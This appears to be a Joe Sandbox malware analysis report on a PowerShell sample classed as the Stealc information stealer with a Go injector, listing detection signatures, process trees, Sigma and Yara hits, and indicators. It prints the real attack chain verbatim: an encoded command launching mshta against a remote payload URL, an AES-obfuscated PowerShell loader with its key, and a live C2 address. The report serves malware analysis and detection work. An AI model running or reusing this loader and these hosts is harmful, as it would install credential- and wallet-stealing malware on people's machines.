Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
verification.b-cdn.net.ps1

Overview

General Information

Sample name:verification.b-cdn.net.ps1
Analysis ID:1491044
MD5:4c99ba8c0fcf994162c991b2b6601509
SHA1:4790b36cdbbededed079473ff1c5c34637f2a2f6
SHA256:8d80e5c7d07aef7d4565f4ddc61d3fc5819a5ea68f2d5282e6ae3e5e17d60e3d
Tags:ps1
Infos:

Detection

Go Injector, Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected Go Injector
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Encrypted powershell cmdline option found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Powershell drops PE file
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Very long command line found
Writes to foreign memory regions
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Execution of Powershell with Base64
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 7100 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4108 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA== MD5: 04029E121A0CFA5991749937DD22A1D9)
      • mshta.exe (PID: 7172 cmdline: "C:\Windows\system32\mshta.exe" https://bidvertiser.b-cdn.net/smart1 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
        • powershell.exe (PID: 7336 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function HbAHmnxA($ZzZovm){return -split ($ZzZovm -replace '..', '0x$& ')};$PEcdKn = HbAHmnxA('649390CFEBE1770BAA5146DE729123CCD838E758E4276A363F637B3AAF033337AC0657955271E9550F501406601E1A41860E46E19B664FF95794FF1F3D04636BD08F0C38C4B63E80890B016BD8AB0B78879EF113B89A3F38F6F895DE87AEA8D3B7F0CCEB19C1832E835097ECCB2C36890967C12BEB560476870CFCA3B2026770977E5BFC6237BA383AB0C9BC4FEE55E653DB382E41C9866A6C0222D784911F31EBB65E3730429D060FF2E1FCA15D8F85018D75055E5F3D7F26332EE40768EC9BAFDC24FC0691D6B57AB81120A83FF0208197B7794EB8E48F081D5265C2EDE5BE7C897C05ABF2349EBA71B3759948F6CC4E3D2AA8CB8B87BC3EF6DD53F55E24B1A14B06982580B23E1CDC89A89E5FC9AEBCC45162B160BDD6D1DD820E751C213F642E6174AB940A544437CBD4B95F451F49854521B6B5F25DC2958288B9E8AE3E84EC687BF5FD542FD21B03B728755D38B9F795538690A1731AD87A4FF035E0E4DF4D5D5926749BCC457636F04DB20D58FEF916462DCAC2915FF336ECE4C613138832FB8CB53EC4DDA139297818B53354F21F92E9A237CDEA5EBA27FD7E08ABAD8BC364C8AC9D4DA7EF88987044E30E52F804D80E2DCF76EB0C85804D4469E0F07C9E5CE26611DE49AD0BB0333D282354BE10F943982430B1169A615E79E3E0C5EC79DA387AD53EAF2FD764DBB293F0EF18D616EEF99C38992715145D16CA68D09F1D913D460445AD05E1641EE4AC2B1E944F7FF45B6C7C51974DECC8B09B1CCBDC8ED7174A14C70F59EA9B96E93E8A336D668FF3C2DC68D75472553892C38D8F32E86361D381E1EE6E6E1BCA21FA73FC43DDDAFCED280453E7B5D154F59EF2BE213C2656F282EABC6A8D2F17A8B47C539E9817820B02E234FD821466297478CF4C06BF88B97D45DCF3E4C807DE237AD7614DCD6332D4DE950C177646C50F08062E130279ECE8B08C9945A79ECF6C4B88024A24DC840A12E22F404F56B7C13E2F9DC8AADEB49ECC7A67AE9983475129E57AFB8D0F9326B22E9B79AAA56DB3EEC92EA9708998095778497441E15D7795F50116CF78185726E9A7F7A3E40D436D50F77BDA8DDDBFD8CEBB4C758EA3595453635FE911BA9691EB0E2A28529D8C4B9E2D50DD40CBDBC57F9D07995096EB6B48448429C1F014B7BDF9146EC21A79ADA827E6590D159548021642354333FC8154696C9E79B4CDA3E5D22551F1F2387AAA9CE4464C571969727F845599B1BD312EB356A5E140EC6F91912B1227B9F3A941727413D53C0FE2B26DE40BB2B36462055BBF7E8A6B8281CC7FFD4048A1CD97104C3A63FF87CE63106EF7443D01D5FCE1FD67A7E73EE2A8F2CD2EFED7B4A7796DB2328BD317F0349F8B606845CBF4FC0F73D45630EF3466836C0A93133F760481FB4E2F4E46DBFF6A7AA0455989567090A3EBB373F3EC52B5EE0558518BC12408677670492BEA93021308DF47CD62CF99B8E473176B2965284653204CE093A6D8CE56300896793A61754D407EB838A56372881C0664AF37F1E9500BBAC243013C5F5953ABE1CD43347B87C2D6ED6169C7B0D8242DE3ED14C3F856F471A13CEFE0993EE315D5305CC2AC9054976C9CA5A6');$jqkxh = [System.Security.Cryptography.Aes]::Create();$jqkxh.Key = HbAHmnxA('52615577706262664D6D43476F4F4344');$jqkxh.IV = New-Object byte[] 16;$SpkOqCAK = $jqkxh.CreateDecryptor();$cWklkDGxO = $SpkOqCAK.TransformFinalBlock($PEcdKn, 0, $PEcdKn.Length);$mTmnXpOAf = [System.Text.Encoding]::Utf8.GetString($cWklkDGxO);$SpkOqCAK.Dispose();& $mTmnXpOAf.Substring(0,3) $mTmnXpOAf.Substring(3) MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 0SmartAssem.exe (PID: 7716 cmdline: "C:\Users\user\AppData\Roaming\0SmartAssem.exe" MD5: 517C4A0A27D1C022A3319AF316407810)
            • BitLockerToGo.exe (PID: 7916 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • svchost.exe (PID: 7256 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://193.176.153.234/587ec30955d49a9c.php"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\0SmartAssem.exeJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
    SourceRuleDescriptionAuthorStrings
    00000008.00000002.1996165603.000000C000380000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
    • 0x0:$x1: 4d5a9000030000000
    0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000008.00000000.1897589705.00007FF74D0EC000.00000002.00000001.01000000.00000011.sdmpJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
        00000008.00000002.2003314361.00007FF74D0EC000.00000002.00000001.01000000.00000011.sdmpJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
          Process Memory Space: powershell.exe PID: 7336INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0x50651:$b1: ::WriteAllBytes(
          • 0x51171:$b1: ::WriteAllBytes(
          • 0x23d19:$s1: -join
          • 0x2461f:$s1: -join
          • 0x4e175:$s1: -join
          • 0x1eb5b:$s4: +=
          • 0x1eb7a:$s4: +=
          • 0x1ebb5:$s4: +=
          • 0x1ebd2:$s4: +=
          • 0x1ec0d:$s4: +=
          • 0x1ec79:$s4: +=
          • 0x1ed05:$s4: +=
          • 0x1ee13:$s4: +=
          • 0x20ade:$s4: +=
          • 0x20b01:$s4: +=
          • 0x259ee:$s4: +=
          • 0x27e8d:$s4: +=
          • 0x27f0c:$s4: +=
          • 0x28127:$s4: +=
          • 0x281aa:$s4: +=
          • 0x28b2b:$s4: +=
          Click to see the 4 entries
          SourceRuleDescriptionAuthorStrings
          8.2.0SmartAssem.exe.7ff74ca60000.8.unpackJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
            8.0.0SmartAssem.exe.7ff74ca60000.0.unpackJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
              SourceRuleDescriptionAuthorStrings
              amsi64_7336.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xc6e3:$b1: ::WriteAllBytes(
              • 0xc356:$s1: -join
              • 0x5b02:$s4: +=
              • 0x5bc4:$s4: +=
              • 0x9deb:$s4: +=
              • 0xbf08:$s4: +=
              • 0xc1f2:$s4: +=
              • 0xc338:$s4: +=
              • 0x19bb7:$s4: +=
              • 0x19cbb:$s4: +=
              • 0x1d117:$s4: +=
              • 0x1d7f7:$s4: +=
              • 0x1dcad:$s4: +=
              • 0x1dd02:$s4: +=
              • 0x1df76:$s4: +=
              • 0x1dfa5:$s4: +=
              • 0x1e4ed:$s4: +=
              • 0x1e51c:$s4: +=
              • 0x1e5fb:$s4: +=
              • 0x20892:$s4: +=
              • 0x20bf4:$s4: +=

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://bidvertiser.b-cdn.net/smart1, CommandLine: "C:\Windows\system32\mshta.exe" https://bidvertiser.b-cdn.net/smart1, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4108, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://bidvertiser.b-cdn.net/smart1, ProcessId: 7172, ProcessName: mshta.exe
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function HbAHmnxA($ZzZovm){return -split ($ZzZovm -replace '..', '0x$& ')};$PEcdKn = HbAHmnxA('649390CFEBE1770BAA5146DE729123CCD838E758E4276A363F637B3AAF033337AC0657955271E9550F501406601E1A41860E46E19B664FF95794FF1F3D04636BD08F0C38C4B63E80890B016BD8AB0B78879EF113B89A3F38F6F895DE87AEA8D3B7F0CCEB19C1832E835097ECCB2C36890967C12BEB560476870CFCA3B2026770977E5BFC6237BA383AB0C9BC4FEE55E653DB382E41C9866A6C0222D784911F31EBB65E3730429D060FF2E1FCA15D8F85018D75055E5F3D7F26332EE40768EC9BAFDC24FC0691D6B57AB81120A83FF0208197B7794EB8E48F081D5265C2EDE5BE7C897C05ABF2349EBA71B3759948F6CC4E3D2AA8CB8B87BC3EF6DD53F55E24B1A14B06982580B23E1CDC89A89E5FC9AEBCC45162B160BDD6D1DD820E751C213F642E6174AB940A544437CBD4B95F451F49854521B6B5F25DC2958288B9E8AE3E84EC687BF5FD542FD21B03B728755D38B9F795538690A1731AD87A4FF035E0E4DF4D5D5926749BCC457636F04DB20D58FEF916462DCAC2915FF336ECE4C613138832FB8CB53EC4DDA139297818B53354F21F92E9A237CDEA5EBA27FD7E08ABAD8BC364C8AC9D4DA7EF88987044E30E52F804D80E2DCF76EB0C85804D4469E0F07C9E5CE26611DE49AD0BB0333D282354BE10F943982430B1169A615E79E3E0C5EC79DA387AD53EAF2FD764DBB293F0EF18D616EEF99C38992715145D16CA68D09F1D913D460445AD05E1641EE4AC2B1E944F7FF45B6C7C51974DECC8B09B1CCBDC8ED7174A14C70F59EA9B96E93E8A336D668FF3C2DC68D75472553892C38D8F32E86361D381E1EE6E6E1BCA21FA73FC43DDDAFCED280453E7B5D154F59EF2BE213C2656F282EABC6A8D2F17A8B47C539E9817820B02E234FD821466297478CF4C06BF88B97D45DCF3E4C807DE237AD7614DCD6332D4DE950C177646C50F08062E130279ECE8B08C9945A79ECF6C4B88024A24DC840A12E22F404F56B7C13E2F9DC8AADEB49ECC7A67AE9983475129E57AFB8D0F9326B22E9B79AAA56DB3EEC92EA9708998095778497441E15D7795F50116CF78185726E9A7F7A3E40D436D50F77BDA8DDDBFD8CEBB4C758EA3595453635FE911BA9691EB0E2A28529D8C4B9E2D50DD40CBDBC57F9D07995096EB6B48448429C1F014B7BDF9146EC21A79ADA827E6590D159548021642354333FC8154696C9E79B4CDA3E5D22551F1F2387AAA9CE4464C571969727F845599B1BD312EB356A5E140EC6F91912B1227B9F3A941727413D53C0FE2B26DE40BB2B36462055BBF7E8A6B8281CC7FFD4048A1CD97104C3A63FF87CE63106EF7443D01D5FCE1FD67A7E73EE2A8F2CD2EFED7B4A7796DB2328BD317F0349F8B606845CBF4FC0F73D45630EF3466836C0A93133F760481FB4E2F4E46DBFF6A7AA0455989567090A3EBB373F3EC52B5EE0558518BC12408677670492BEA93021308DF47CD62CF99B8E473176B2965284653204CE093A6D8CE56300896793A61754D407EB838A56372881C0664AF37F1E9500BBAC243013C5F5953ABE1CD43347B87C2D6ED6169C7B0D8242DE3ED14C3F856F471A13CEFE0993EE315D5305CC2AC9054976C9CA5A6');$jqkxh = [System.Security.Cryptography.Aes]::Create();$jqkxh.Key = HbAHmnxA('52615577706262664D6D43476F4F4344');$jqkxh.IV = New-Object byte[] 16;$SpkOqCAK = $jqkxh.CreateDecryptor();$cWklkDGxO = $SpkOqCAK.TransformFinalBlock($PEcdKn, 0, $PEcdKn.Length);$mTmnXpOAf = [System.Text.Encoding]::Utf8.GetString($cWklkDGxO);$SpkOqCAK.Dispose();& $mTmnXpOAf.Substring(0,3) $mTmnXpOAf.Substring(3), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function HbAHmnxA($ZzZovm){return -spl
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7100, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==, ProcessId: 4108, ProcessName: powershell.exe
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", ProcessId: 7100, ProcessName: powershell.exe
              Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7336, TargetFilename: C:\Users\user\AppData\Roaming\Qt5PrintSupportVBox.dll
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7100, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==, ProcessId: 4108, ProcessName: powershell.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", ProcessId: 7100, ProcessName: powershell.exe
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7256, ProcessName: svchost.exe
              Timestamp:2024-08-10T19:10:37.251997+0200
              SID:2044243
              Severity:1
              Source Port:49743
              Destination Port:80
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-10T19:10:02.529769+0200
              SID:2026434
              Severity:1
              Source Port:443
              Destination Port:49730
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://bidvertiser.b-cdn.net/smart1.zipAvira URL Cloud: Label: malware
              Source: https://bidvertiser.b-cdn.net/smart1Avira URL Cloud: Label: malware
              Source: https://bidvertiser.b-cdn.net/smart1...Avira URL Cloud: Label: malware
              Source: 0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://193.176.153.234/587ec30955d49a9c.php"}
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\smart1[1]ReversingLabs: Detection: 39%
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\smart1[1]Virustotal: Detection: 28%Perma Link
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exeReversingLabs: Detection: 18%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability